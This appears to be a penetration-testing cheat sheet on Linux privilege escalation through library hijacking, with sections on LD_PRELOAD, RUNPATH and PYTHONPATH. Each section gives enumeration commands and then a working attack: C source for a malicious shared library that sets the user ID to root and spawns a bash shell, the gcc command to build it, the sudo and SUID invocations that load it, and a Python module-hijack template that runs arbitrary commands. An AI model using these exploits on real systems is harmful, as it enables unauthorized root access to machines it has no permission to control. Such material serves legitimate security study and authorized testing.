Linux Privilege Escalation with Library

Contains the details of the topic Privilege Escalation/Linux/Functionality/Library.

LD_PRELOAD

The LD_PRELOAD environment variable can specify to load a library before running a binary. The functions of this library take precedence over the default functions. Therefore, the idea is to have it load a malicious library.

Requirements

• Have control of the LD_PRELOAD environment variable.

• Dynamic executables in SUDOERS or with SUID.

Enumeration

ldd <BINARY_SUDOERS_SUID>

Attack

Create the library mylib.c

mylib.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Compile the library

gcc -fPIC -shared -o mylib.so mylib.c -nostartfiles

Use the library with LD_PRELOAD

sudo LD_PRELOAD=/tmp/root.so <SUDOERS_COMMAND>

LD_PRELOAD=/tmp/root.so <SUID_BINARY>

RUNPATH

The RUNPATH setting within binaries specifies which folders take precedence over other folders to look for libraries on. If that setting points to a user-writable folder, it is possible to have it load a malicious library.

Requirements

• Have a dynamic binary in SUDOERS or with SUID.

• This binary must have RUNPATH set to a writable directory.

Enumeration

readelf -d <BINARY_SUDOERS_SUID> | grep PATH
# Visualize if there is runpath and where it points to

ldd <BINARY_SUDOERS_SUID>
# name of dynamic libraries required

Attack

Try replacing the library in the directory pointed to by RUNPATH with another one, ex., /lib/x86_64-linux-gnu/libc.so.6. Check the error it returns, usually specifying the functions it cannot find.

Create the library with the same name as the library in the directory pointed to by RUNPATH, with the required functions inside it

mylib.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

void <FUNCTION_NAME_REQUIRED>() {}

It is also possible to put the code of _init in the function below.

Compile the library

gcc -fPIC -shared -o <NAME_SHARED_LIBRARY_IN_RUNPATH> mylib.c -nostartfiles

Run the binary normally

sudo <SUDOERS_COMMAND>

./<SUID_BINARY>

PYTHONPATH

Requirements

• Executable python scripts such as SUDOERS.

• Know the imported modules and the functions used by those modules.

• Import modules that are located in writable directories or Among the PATHs that python uses to search for and import modules, we have write access to a PATH with a higher priority than the PATH in which the imported module used in the script is located. or The PYTHONPATH environment variable is manipulable (it indicates in which directory Python can look for modules to import)

Warning: The SUID bit does not work with interpreted scripts (such as Python).

Enumeration

python3 -c 'import sys; print("\n".join(sys.path))'
# Place and order of priority from which python imports modules (first search in current script folder)

pip3 show <MODULO>
# Place of installation of a detarmined module.

echo $PYTHONPATH

Attack

Add the desired code inside the function of the (writable) module imported from the executable script in SUDOERS. or Create a python file with the same name as the module imported from the executable script in SUDOERS, and implement the function that is used by inserting the desired code. or Modify the PYTHONPATH environment variable to redirect the Python search functionality to a user-writable folder, continuing with the second attack.

sudo PYTHONPATH=<PATH_DIRECTORY_SCRIVIBILE> python3 <PROGRAMMA>

def <FUNCTION_NAME>():
    ...
    import os
    os.system('<COMMAND>')
    ....